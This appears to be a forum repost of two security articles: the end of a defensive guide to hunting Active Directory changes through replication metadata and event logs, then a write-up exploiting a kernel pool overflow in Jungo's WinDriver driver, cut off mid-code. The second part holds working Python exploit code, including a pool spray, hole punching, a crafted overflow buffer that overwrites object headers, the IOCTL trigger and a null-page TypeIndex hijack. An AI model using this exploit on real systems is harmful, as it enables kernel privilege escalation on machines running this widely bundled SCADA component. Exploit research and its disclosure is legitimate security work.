mass enumeration of EVERY user account that had a SPN set and then deleted, we can use -LDAPFilter ‘(samAccountType=805306368)’ -Properties servicePrincipalName, and filtering out anything with an odd Version: Object Owner/DACL Modification I originally thought this scenario would be tough as well, as I had guessed that whenever delegation is changed on an OU those new rights were reflected in the ntSecurityDescriptor of any user objects down the inheritance chain. However, I was mistaken- any delegation changes are in the ntSecurityDescriptor of the OU/container, and I believe those inherited rights are calculated on LDAP enumeration by the server. In other words, the ntSecurityDescriptor of user/group/computer objects should only change when the owner is explicitly changed, or a new ACE is manually added to that object. Since an object’s DACL and owner are both stored in ntSecurityDescriptor, and the event log data doesn’t provide details on the previous/changed value, we have no way of knowing if it was a DACL or owner based changed. However, we can still figure out who initiated the change again using event 4738: Just like with SPNs, we can also sweep for any users (or other objects) that had their DACL or owner changed (i.e. Version > 1): If we periodically enumerate all of this data for all users/other objects, we can start to timeline and calculate change deltas, but that’s for another post :) User Password Reset Unfortunately, this is probably the hardest scenario. Since password changes/resets are a fairly common occurrence, it’s difficult to reliably pull a pattern out of the data based solely on the password last set time. Luckily however, enabling the “Audit User Account Management” policy also produces event 4723 (a user changed their own password) and event 4724 (a password reset was initiated): And we get the time of the reset, the user that was force-reset, and the principal that initiated it! Group Policy Object Editing If you’re able to track down a malicious GPO edit, and want to know the systems/users affected, I’ve talked about that process as well. However, this section will focus on trying to identify what file was edited and by whom. Every time a GPO is modified, the versionNumber property is increased. So if we pull the attribute metadata concerning the last time versionNumber was modified, and correlate this time (as a range) with edits to all files and folders in the SYSVOL path we can identify the files that were likely modified by the last edit to the GPO. Here’s how we might accomplish that: You can see above that the Groups.xml group policy preferences file was likely the file edited. To identify what user made the changes, we need to tweak “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> DS Access -> Audit Active Directory Service Changes”: We can then comb for event IDs of 5136 to and use the alert data to narrow down the event that caused the versionNumber modification: We see the distinguishedName of the GPO object being modified, as well as who initiated the change. There is some more information here in case you’re interested. Sidenote: Resolving LastOriginatingDsaDN As I previously mentioned, the LastOriginatingDsaDN property indicates the the last directory service agent that the given change originated from. For us to make the most use of this information, we want to map this particular DSA record back to the domain controller it’s running on. This is unfortunately a multi-step process, but I’ll walk you through it below using PowerView. Say the change we want to track back is the following deleted Domain Admin member: We see that the DSA distinguished name exists in the CN=Configuration container of the associated domain. We can retrieve the full object this references by using PowerView’s Get-DomainObject with the -SearchBase set to “ldap://CN=Configuration,DC=testlab,DC=local”: We see above that this has a NTDS-DSA object category, and we see a serverreferencebl (backlink) property that points us in the right direction. If we resolve this new object DN, we get the following: Now we see the actual domain controller distinguished name linked in the msdfsr-computerreference property of this new result, and the serverreference matches the LastOriginatingDsaDN from our initial result. This means we can skip that middle step and query for this ms-DFSR-Member object directory, linked by the serverreference attribute, by way of a custom LDAP filter. To finish, we can extract the msdfsr-computerreference property and resolve it to the actual domain controller object: Success! \m/ Wrapup Hopefully this causes at least a few people to think about the hunting/forensic possibilities from the Active Directory side. There’s a wealth of opportunity here to detect our ACL based attack components, as well as a myriad of other Active Directory “bad”. Also, observant readers may have noticed that I ignored an entire defensive component here, system access control lists (SACLs), which provide that chance to implement additional auditing. I’ll cover SACLs in a future post, showing how to utilize BloodHound to identify “key terrain” to place very specific SACL auditing rules. Until then, have fun! Originally published at harmj0y. Sursa: https://posts.specterops.io/hunting-with-active-directory-replication-metadata-1dab2f681b19
  20. Sharks in the Pool :: Mixed Object Exploitation in the Windows Kernel Pool Sep 6, 2017 This year at Blackhat, I attended the Advanced Windows Exploitation (AWE) class. It’s a hands on class teaching Windows exploitation and whilst I’m relatively versed in usermode exploitation, I needed to get up to speed on windows kernel exploitation. If you haven’t taken the class, I encourage you too! TL;DR I explain a basic kernel pool overflow vulnerability and how you can exploit it by overwriting the TypeIndex after spraying the kernel pool with a mix of kernel objects. Introduction So, after taking the AWE course I really wanted to find and exploit a few kernel vulnerabilities. Whilst I think the HackSys Extreme Vulnerable Driver (HEVD) is a great learning tool, for me, it doesn’t work. I have always enjoyed finding and exploiting vulnerabilities in real applications as they present a hurdle that is often not so obvious. Since that time I took the course, I have been very slowly (methodically, almost insanely) developing a windows kernel device driver fuzzer. Using this private fuzzer (eta wen publik jelbrek?), I found the vulnerability presented in this post. The technique demonstrated for exploitation is nothing new, but it’s slight variation allows an attacker to basically exploit any pool size. This blog post is mostly a reference for myself, but hopefully it benefits someone else attempting pool exploitation for the first time. The vulnerability After testing a few SCADA products, I came across a third party component called “WinDriver”. After a short investigation I realized this is Jungo’s DriverWizard WinDriver. This product is bundled and shipped in several SCADA applications, often with an old version too. After installation, it installs a device driver named windrvr1240.sys to the standard windows driver folder. With some basic reverse engineering, I found several ioctl codes that I plugged directly into my fuzzers config file. { "ioctls_range":{ "start": "0x95380000", "end": "0x9538ffff" } } Then, I enabled special pool using verifier /volatile /flags 0x1 /adddriver windrvr1240.sys and run my fuzzer for a little bit. Eventually finding several exploitable vulnerabilities, in particular this one stood out: kd> .trap 0xffffffffc800f96c ErrCode = 00000002 eax=e4e4e4e4 ebx=8df44ba8 ecx=8df45004 edx=805d2141 esi=f268d599 edi=00000088 eip=9ffbc9e5 esp=c800f9e0 ebp=c800f9ec iopl=0 nv up ei pl nz na pe cy cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010207 windrvr1240+0x199e5: 9ffbc9e5 8941fc mov dword ptr [ecx-4],eax ds:0023:8df45000=???????? kd> dd esi+ecx-4 805d2599 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25a9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25b9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25c9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25d9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25e9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d25f9 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 805d2609 e4e4e4e4 e4e4e4e4 e4e4e4e4 e4e4e4e4 That’s user controlled data stored in [esi+ecx] and it’s writing out-of-bounds of a kernel pool. Nice. On closer inspection, I noticed that this is actually a pool overflow triggered via an inline copy operation at loc_4199D8. .text:0041998E sub_41998E proc near ; CODE XREF: sub_419B7C+3B2 .text:0041998E .text:0041998E arg_0 = dword ptr 8 .text:0041998E arg_4 = dword ptr 0Ch .text:0041998E .text:0041998E push ebp .text:0041998F mov ebp, esp .text:00419991 push ebx .text:00419992 mov ebx, [ebp+arg_4] .text:00419995 push esi .text:00419996 push edi .text:00419997 push 458h ; fized size_t +0x8 == 0x460 .text:0041999C xor edi, edi .text:0041999E push edi ; int .text:0041999F push ebx ; void * .text:004199A0 call memset ; memset our buffer before the overflow .text:004199A5 mov edx, [ebp+arg_0] ; this is the SystemBuffer .text:004199A8 add esp, 0Ch .text:004199AB mov eax, [edx] .text:004199AD mov [ebx], eax .text:004199AF mov eax, [edx+4] .text:004199B2 mov [ebx+4], eax .text:004199B5 mov eax, [edx+8] .text:004199B8 mov [ebx+8], eax .text:004199BB mov eax, [edx+10h] .text:004199BE mov [ebx+10h], eax .text:004199C1 mov eax, [edx+14h] .text:004199C4 mov [ebx+14h], eax .text:004199C7 mov eax, [edx+18h] ; read our controlled size from SystemBuffer .text:004199CA mov [ebx+18h], eax ; store it in the new kernel buffer .text:004199CD test eax, eax .text:004199CF jz short loc_4199ED .text:004199D1 mov esi, edx .text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write .text:004199D6 sub esi, ebx .text:004199D8 .text:004199D8 loc_4199D8: ; CODE XREF: sub_41998E+5D .text:004199D8 mov eax, [esi+ecx] ; load the first write value from the buffer .text:004199DB inc edi ; copy loop index .text:004199DC mov [ecx], eax ; first dword write .text:004199DE lea ecx, [ecx+8] ; set the index into our overflown buffer .text:004199E1 mov eax, [esi+ecx-4] ; load the second write value from the buffer .text:004199E5 mov [ecx-4], eax ; second dword write .text:004199E8 cmp edi, [ebx+18h] ; compare against our controlled size .text:004199EB jb short loc_4199D8 ; jump back into loop The copy loop actually copies 8 bytes for every iteration (a qword) and overflows a buffer of size 0x460 (0x458 + 0x8 byte header). The size of copy is directly attacker controlled from the input buffer (yep you read that right). No integer overflow, no stored in some obscure place, nada. We can see at 0x004199E8 that the size is attacker controlled from the +0x18 offset of the supplied buffer. Too easy! Exploitation Now comes the fun bit. A generic technique that can be used is the object TypeIndex overwrite which has been blogged on numerous occasions (see references) and is at least 6 years old, so I won’t go into too much detail. Basically the tl;dr; is that using any kernel object, you can overwrite the TypeIndex stored in the _OBJECT_HEADER. Some common objects that have been used in the past are the Event object (size 0x40) and the IoCompletionReserve object (size 0x60). Typical exploitation goes like this: Spray the pool with an object of size X, filling pages of memory. Make holes in the pages by freeing/releasing adjacent objects, triggering coalescing to match the target chunk size (in our case 0x460). Allocate and overflow the buffer, hopefully landing into a hole, smashing the next object’s _OBJECT_HEADER, thus, pwning the TypeIndex. For example, say if your overflowed buffer is size 0x200, you could allocate a whole bunch of Event objects, free 0x8 of them (0x40 * 0x8 == 0x200) and voilà, you have your hole where you can allocate and overflow. So, assuming that, we need a kernel object that is modulus with our pool size. The problem is, that doesn’t work with some sizes. For example our pool size is 0x460, so if we do: >>> 0x460 % 0x40 32 >>> 0x460 % 0x60 64 >>> We always have a remainder. This means we cannot craft a hole that will neatly fit our chunk, or can we? There are a few ways to solve it. One way was to search for a kernel object that is modulus with our target buffer size. I spent a little time doing this and found two other kernel objects: # 1 type = "Job" size = 0x168 windll.kernel32.CreateJobObjectW(None, None) # 2 type = "Timer" size = 0xc8 windll.kernel32.CreateWaitableTimerW(None, 0, None) However, those sizes were no use as they are not modulus with 0x460. After some time testing/playing around, I relized that we can do this: >>> 0x460 % 0xa0 0 >>> Great! So 0xa0 can be divided evenly into 0x460, but how do we get kernel objects of size 0xa0? Well if we combine the Event and the IoCompletionReserve objects (0x40 + 0x60 = 0xa0) then we can achieve it. The Spray def we_can_spray(): """ Spray the Kernel Pool with IoCompletionReserve and Event Objects. The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length. These are allocated from the Nonpaged kernel pool. """ handles = [] IO_COMPLETION_OBJECT = 1 for i in range(0, 25000): handles.append(windll.kernel32.CreateEventA(0,0,0,0)) hHandle = HANDLE(0) handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT)) # could do with some better validation if len(handles) > 0: return True return False This function sprays 50,000 objects. 25,000 Event objects and 25,000 IoCompletionReserve objects. This looks quite pretty in windbg: kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Allocated) IoCo (Protected) <--- chunk first allocated in the page 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected) Creating Holes The ‘IoCo’ tag is representative of a IoCompletionReserve object and a ‘Even’ tag is representative of an Event object. Notice that our first chunks offset is 0x60, thats the offset we will start freeing from. So if we free groups of objects, that is, the IoCompletionReserve and the Event our calculation becomes: >>> "0x%x" % (0x7 * 0xa0) '0x460' >>> We will end up with the correct size. Let’s take a quick look at what it looks like if we free the next 7 IoCompletionReserve object’s only. kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Free) IoCo 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Free) IoCo 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Free) IoCo 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Free) IoCo 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Free) IoCo 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Free) IoCo 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Free) IoCo 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected) So we can see we have seperate freed chunks. But we want to coalesce them into a single 0x460 freed chunk. To achieve this, we need to set the offset for our chunks to 0x60 (The first pointing to 0xXXXXY060). bin = [] # object sizes CreateEvent_size = 0x40 IoCompletionReserve_size = 0x60 combined_size = CreateEvent_size + IoCompletionReserve_size # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object offset = IoCompletionReserve_size for i in range(offset, offset + (7 * combined_size), combined_size): try: # chunks need to be next to each other for the coalesce to take effect bin.append(khandlesd[obj + i]) bin.append(khandlesd[obj + i - IoCompletionReserve_size]) except KeyError: pass # make sure it's contiguously allocated memory if len(tuple(bin)) == 14: holes.append(tuple(bin)) # make the holes to fill for hole in holes: for handle in hole: kernel32.CloseHandle(handle) Now, when we run the freeing function, we punch holes into the pool and get a freed chunk of our target size. kd> !pool 8674e000 Pool page 8674e000 region is Nonpaged pool *8674e000 size: 460 previous size: 0 (Free) *Io <-- 0x460 chunk is free Pooltag Io : general IO allocations, Binary : nt!io 8674e460 size: 60 previous size: 460 (Allocated) IoCo (Protected) 8674e4c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e500 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e560 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e5a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e600 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e640 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e6a0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e6e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e740 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e780 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e7e0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e820 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e880 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e8c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e920 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e960 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e9c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ea00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ea60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eaa0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eb00 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eb40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eba0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ebe0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ec40 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ec80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ece0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ed20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ed80 size: 40 previous size: 60 (Allocated) Even (Protected) 8674edc0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ee20 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ee60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eec0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ef00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ef60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674efa0 size: 60 previous size: 40 (Allocated) IoCo (Protected) We can see that the freed chunks have been coalesced and now we have a perfect sized hole. All we need to do is allocate and overwrite. def we_can_trigger_the_pool_overflow(): """ This triggers the pool overflow vulnerability using a buffer of size 0x460. """ GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE_NAME = "\\\\.\\WinDrvr1240" dwReturn = c_ulong() driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) inputbuffer = 0x41414141 inputbuffer_size = 0x5000 outputbuffer_size = 0x5000 outputbuffer = 0x20000000 alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) IoStatusBlock = c_ulong() if driver_handle: dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) return True return False Surviving the Overflow You may have noticed the null dword in the exploit at offset 0x90 within the buffer. def alloc_pool_overflow_buffer(base, input_size): """ Craft our special buffer to trigger the overflow. """ print "(+) allocating pool overflow input buffer" baseadd = c_int(base) size = c_int(input_size) input = "\x41" * 0x18 # offset to size input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow) input += "\x42" * (0x90-len(input)) # padding to survive bsod input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer This is needed to survive the overflow and avoid any further processing. The following code listing is executed directly after the copy loop. .text:004199ED loc_4199ED: ; CODE XREF: sub_41998E+41 .text:004199ED push 9 .text:004199EF pop ecx .text:004199F0 lea eax, [ebx+90h] ; controlled from the copy .text:004199F6 push eax ; void * .text:004199F7 lea esi, [edx+6Ch] ; controlled offset .text:004199FA lea eax, [edx+90h] ; controlled offset .text:00419A00 lea edi, [ebx+6Ch] ; controlled from copy .text:00419A03 rep movsd .text:00419A05 push eax ; int .text:00419A06 call sub_4196CA ; call sub_4196CA The important point is that the code will call sub_4196CA. Also note that @eax becomes our buffer +0x90 (0x004199FA). Let’s take a look at that function call. .text:004196CA sub_4196CA proc near ; CODE XREF: sub_4195A6+1E .text:004196CA ; sub_41998E+78 ... .text:004196CA .text:004196CA arg_0 = dword ptr 8 .text:004196CA arg_4 = dword ptr 0Ch .text:004196CA .text:004196CA push ebp .text:004196CB mov ebp, esp .text:004196CD push ebx .text:004196CE mov ebx, [ebp+arg_4] .text:004196D1 push edi .text:004196D2 push 3C8h ; size_t .text:004196D7 push 0 ; int .text:004196D9 push ebx ; void * .text:004196DA call memset .text:004196DF mov edi, [ebp+arg_0] ; controlled buffer .text:004196E2 xor edx, edx .text:004196E4 add esp, 0Ch .text:004196E7 mov [ebp+arg_4], edx .text:004196EA mov eax, [edi] ; make sure @eax is null .text:004196EC mov [ebx], eax ; the write here is fine .text:004196EE test eax, eax .text:004196F0 jz loc_4197CB ; take the jump The code gets a dword value from our SystemBuffer at +0x90, writes to our overflowed buffer and then tests it for null. If it’s null, we can avoid further processing in this function and return. .text:004197CB loc_4197CB: ; CODE XREF: sub_4196CA+26 .text:004197CB pop edi .text:004197CC pop ebx .text:004197CD pop ebp .text:004197CE retn 8 If we don’t do this, we will likley BSOD when attempting to access non-existant pointers from our buffer within this function (we could probably survive this anyway). Now we can return cleanly and trigger the eop without any issues. For the shellcode cleanup, our overflown buffer is stored in @esi, so we can calculate the offset to the TypeIndex and patch it up. Finally, smashing the ObjectCreateInfo with null is fine because the system will just avoid using that pointer. Crafting Our Buffer Since the loop copies 0x8 bytes on every iteration and since the starting index is 0x1c: .text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write We can do our overflow calculation like so. Let’s say we want to overflow the buffer by 44 bytes (0x2c). We take the buffer size, subtract the header, subtract the starting index offset, add the amount of bytes we want to overflow and divide it all by 0x8 (due to the qword copy per loop iteration). (0x460 - 0x8 - 0x1c + 0x2c) / 0x8 = 0x8d So a size of 0x8d will overflow the buffer by 0x2c or 44 bytes. This smashes the pool header, quota and object header. # repair the allocated chunk header... input += struct.pack("<I", 0x040c008c) # _POOL_HEADER input += struct.pack("<I", 0xef436f49) # _POOL_HEADER (PoolTag) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (PointerCount) input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (HandleCount) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (Lock) input += struct.pack("<I", 0x00080000) # _OBJECT_HEADER (TypeIndex) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo) We can see that we set the TypeIndex to 0x00080000 (actually it’s the lower word) to null. This means that that the function table will point to 0x0 and conveniently enough, we can map the null page. kd> dd nt!ObTypeIndexTable L2 82b7dee0 00000000 bad0b0b0 Note that the second index is 0xbad0b0b0. I get a funny feeling I can use this same technique on x64 as well :-> Triggering Code Execution in the Kernel Well, we survive execution after triggering our overflow, but in order to gain eop we need to set a pointer to 0x00000074 to leverage the OkayToCloseProcedure function pointer. kd> dt nt!_OBJECT_TYPE name 84fc8040 +0x008 Name : _UNICODE_STRING "IoCompletionReserve" kd> dt nt!_OBJECT_TYPE 84fc8040 . +0x000 TypeList : [ 0x84fc8040 - 0x84fc8040 ] +0x000 Flink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ] +0x004 Blink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ] +0x008 Name : "IoCompletionReserve" +0x000 Length : 0x26 +0x002 MaximumLength : 0x28 +0x004 Buffer : 0x88c01090 "IoCompletionReserve" +0x010 DefaultObject : +0x014 Index : 0x0 '' <--- TypeIndex is 0x0 +0x018 TotalNumberOfObjects : 0x61a9 +0x01c TotalNumberOfHandles : 0x61a9 +0x020 HighWaterNumberOfObjects : 0x61a9 +0x024 HighWaterNumberOfHandles : 0x61a9 +0x028 TypeInfo : <-- TypeInfo is offset 0x28 from 0x0 +0x000 Length : 0x50 +0x002 ObjectTypeFlags : 0x2 '' +0x002 CaseInsensitive : 0y0 +0x002 UnnamedObjectsOnly : 0y1 +0x002 UseDefaultObject : 0y0 +0x002 SecurityRequired : 0y0 +0x002 MaintainHandleCount : 0y0 +0x002 MaintainTypeList : 0y0 +0x002 SupportsObjectCallbacks : 0y0 +0x002 CacheAligned : 0y0 +0x004 ObjectTypeCode : 0 +0x008 InvalidAttributes : 0xb0 +0x00c GenericMapping : _GENERIC_MAPPING +0x01c ValidAccessMask : 0xf0003 +0x020 RetainAccess : 0 +0x024 PoolType : 0 ( NonPagedPool ) +0x028 DefaultPagedPoolCharge : 0 +0x02c DefaultNonPagedPoolCharge : 0x5c +0x030 DumpProcedure : (null) +0x034 OpenProcedure : (null) +0x038 CloseProcedure : (null) +0x03c DeleteProcedure : (null) +0x040 ParseProcedure : (null) +0x044 SecurityProcedure : 0x82cb02ac long nt!SeDefaultObjectMethod+0 +0x048 QueryNameProcedure : (null) +0x04c OkayToCloseProcedure : (null) <--- OkayToCloseProcedure is offset 0x4c from 0x0 +0x078 TypeLock : +0x000 Locked : 0y0 +0x000 Waiting : 0y0 +0x000 Waking : 0y0 +0x000 MultipleShared : 0y0 +0x000 Shared : 0y0000000000000000000000000000 (0) +0x000 Value : 0 +0x000 Ptr : (null) +0x07c Key : 0x6f436f49 +0x080 CallbackList : [ 0x84fc80c0 - 0x84fc80c0 ] +0x000 Flink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ] +0x004 Blink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ] So, 0x28 + 0x4c = 0x74, which is the location of where our pointer needs to be. But how is the OkayToCloseProcedure called? Turns out, that this is a registered aexit handler. So to trigger the execution of code, one just needs to free the corrupted IoCompletionReserve. We don’t know which handle is associated with the overflown chunk, so we just free them all. def trigger_lpe(): """ This function frees the IoCompletionReserve objects and this triggers the registered aexit, which is our controlled pointer to 